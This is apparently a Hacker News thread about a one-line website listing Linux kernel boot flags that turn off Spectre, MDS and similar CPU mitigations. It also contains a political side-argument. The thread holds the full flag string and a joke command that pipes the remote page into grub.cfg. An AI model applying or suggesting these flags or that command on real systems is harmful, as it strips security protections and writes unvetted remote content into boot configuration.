I trust all of my programs, as I use only open-source or "big-player" packages. The only problem would seem to be JS from shady websites.

I guess now the question is: how much time do I have to spend on such a site before it can get my private SSH keys?


The JavaScript of shady adverts that sometimes pops through can also run on non-shady websites. So you are not entirely safe by only browsing safe sites.


That doesn't answer the question, of course; it's just a sales pitch for the proverbial tiger-proof rock. To reiterate: how long do they have to spend on a shady site before a successful Spectre exploit takes place?

If this were actually happening in the real world, maybe we'd know.

But it's not, so we don't, and life goes on.

Albeit slowly.


There are ready-made Spectre exploits that will attack your browser if it hasn’t been hardened yet; these kinds of exploits are fairly straightforward. Spectre v2 is harder to pull off, but can reach across processes and so you’re presumably vulnerable to that.


Do you trust the sites you visit not to be compromised by shady ad networks, shady individuals, etc.?


Yes, a lot of these vulnerabilities have demos on GitHub, so you can run an exploit locally.


noibrs noibpb nopti nospectre_v2 nospectre_v1 l1tf=off nospec_store_bypass_disable no_stf_barrier mds=off tsx=on tsx_async_abort=off mitigations=off
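If you do boot with that string, it's worth verifying the kernel actually received it, since a typo in the bootloader config fails silently. A quick check, assuming a Linux system with procfs mounted:

```shell
# Show the command line the running kernel was actually booted with,
# then look for the catch-all flag specifically.
cat /proc/cmdline
if grep -qw 'mitigations=off' /proc/cmdline; then
    echo "mitigations disabled"
else
    echo "mitigations at kernel defaults"
fi
```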


mds=off

Does this mitigate MDS attacks?

https://mdsattacks.com/


Is there anything like this for macOS (for systems that do not run any untrusted code/scripts or are not internet connected, of course)?


There might be some under 'sysctl -a'.


Just because you can doesn't mean you should.


Amazing that a 'website' like this can make the top page. Just a plain, un-styled string of, presumably, some sort of configuration. No explanation of how to use it or what it does.

I see 'spectre' in there, so there's a clue. I mean, after reading comments, googling, etc., I understand now, but at first I thought the site was broken.

Wouldn't it have been better to post an actual write up that explains what this is? We are setting the bar really low here :)


I see it as a sort of expertise threshold. It's not for you if you don't get it, but if you do, there's lots to discuss. It's what relevance used to be, without marketing.


Haha, I suppose that is what they were going for. I'll admit it's not for me. I definitely don't go poking around in my GRUB config very often, but, after reading the write ups others have posted, I did learn some new things, so there's that.

From other commenters:

https://linuxreviews.org/HOWTO_make_Linux_run_blazing_fast_(...

https://www.kernel.org/doc/html/latest/admin-guide/kernel-pa...
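For anyone poking around after reading those: the kernel also reports its current mitigation state per vulnerability through sysfs, present on any reasonably recent Linux kernel:

```shell
# One line per known CPU vulnerability, showing whether this machine is
# affected and which mitigation (if any) is currently active.
grep -r . /sys/devices/system/cpu/vulnerabilities/ 2>/dev/null \
    || echo "vulnerabilities sysfs not present (older kernel?)"
```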


I guess the shocking simplicity is part of the appeal


I'm the author - the idea was, that you would be able to do

    curl -s https://make-linux-fast-again.com | awk '{ print "GRUB_CMDLINE_LINUX_DEFAULT=\"" $0 "\"" }' >> grub.cfg
to use the parameters directly (it's a joke! don't!), which would not be possible if there were any other content on the webpage (at least not without taking more than the 2 minutes this joke took to set up)
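(For anyone tempted to apply the flags for real rather than as a joke: the conventional route is editing the default cmdline and regenerating the config, not appending to a generated grub.cfg. A sketch on a throwaway copy; on a real system the file is /etc/default/grub, followed by update-grub or grub2-mkconfig depending on the distro:)

```shell
# Demonstrated on a temp file so nothing real is modified; the sed
# appends the flag inside the existing quoted value.
printf 'GRUB_CMDLINE_LINUX_DEFAULT="quiet splash"\n' > /tmp/default-grub
sed -i 's/^\(GRUB_CMDLINE_LINUX_DEFAULT="[^"]*\)"/\1 mitigations=off"/' /tmp/default-grub
cat /tmp/default-grub
# -> GRUB_CMDLINE_LINUX_DEFAULT="quiet splash mitigations=off"
```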


Too late, I just blindly pasted that into my terminal and ran it :p

OK cool. Thanks for the explanation, that makes sense why it's empty then!

I definitely didn't get it. I take back what I said :) It did lead me to poking around the Linux kernel docs so that's not a bad way to start the day!


[flagged]


I think it's meant to be tongue in cheek. However, I agree that "Make $object $adjective again" is inextricably linked to the Trump campaign, so if anyone is using it, I hope they realise that they'll either be thought of as right-wingers or as satirists by much of their audience.


as the owner of that DNS, I sure hope most people in the position of stumbling on it recognize the naming as eye-catching satire :)


I guessed that was the case for you, but I've seen the phrase used in a few other places and I have a feeling many are not as self-aware :-)


Well, that would be evidence that it is quite extricably linked to the Trump campaign.

There is prior art for campaign slogans escaping the political world and transcending their original partisan meanings. "A chicken in every pot", "Don't Mess with Texas" ("slogan that began as anti-littering campaign; later adopted for political and other purposes" - Wikipedia), etc. Wikipedia also suggests it has been used prior to Trump, including by both Bill and Hillary Clinton (https://en.wikipedia.org/wiki/Make_America_Great_Again ).


This reads like flamebait to me. I don't see that it adds anything to the discussion.


It's a relevant comment. The author chose a title with heavy ties to politics. They shouldn't then be surprised when people bring that up in discussion. I personally also think it's not wise to choose a title that enforces a slogan with ties to hateful politics unless that was your goal from the start.


All political slogans have ties to politics which someone finds hateful.


This is silly to say. Why deliberately miss the point?

"Finding" some hateful is not the same as being on the receiving end of types of hate that have caused a lot of violence and persecution over centuries.


Very simply, the slogan is not hateful. That you have rationalizations for finding it so doesn't change this fact.


Like I said earlier, why deliberately miss the point? "Make America Great Again" is a hateful slogan. You're purposely denying that to try to prove some point.


No, I'm simply stating a fact. There is no reason for you to presume motive. You have chosen to perceive the slogan as hateful. This is your belief, your perception. It's not present in the slogan itself.


It's not a "fact." But really, if you truly think that there is no hate in that slogan, then there's no point having this conversation, because I know what kind of person you are.


Thank you for acknowledging my ability to look beyond partisan biases.


Learn to take a joke.


While it might be straying slightly towards the off-topic, the second part is a very astute observation and an interesting connection that I did not personally make at first glance.


This is the same mindset that led the MAGA people to shut down the pandemics response team.


Please don't post political flamebait to HN. It leads nowhere good.

https://news.ycombinator.com/newsguidelines.html


Or, you can use AMD.


AMD has speculative side channels as well…


Linux 2020! :-D


Or use AMD....


Spectre mitigations are applied for both Intel and AMD.


Only partly

> Based on external and internal analysis, AMD believes it is not vulnerable to the SWAPGS variant attacks because AMD products are designed not to speculate on the new GS value following a speculative SWAPGS. For the attack that is not a SWAPGS variant, the mitigation is to implement our existing recommendations for Spectre variant 1.

https://www.amd.com/en/corporate/product-security


Most of the Spectre variants do affect AMD as well, however.


Some mitigations are also applied to AMD Zen 2. A benchmark on Phoronix showed a performance cost of between 5% and 15%.


AMD only just now released laptop CPUs that can compete with intel.


What has that got to do with anything?


There was no incentive to go with AMD, so now a ton of people want their Intel performance back instead of buying a new PC. Heck, this also applies to FX CPUs.



This has some serious "I disabled my password to make logging in easier, but I'm still safe because the hacker would have to guess my username" vibes to it.


Unless you're doing it on a computer that is completely off any network and has no form of communication with the outside world, that's a very bad idea.

Edit: Ok, plenty of people already said things in that context already apparently...


I did this on my laptop a few months ago. It was like getting a new computer. I haven't benchmarked it, but boot time halved and it felt much faster to use.



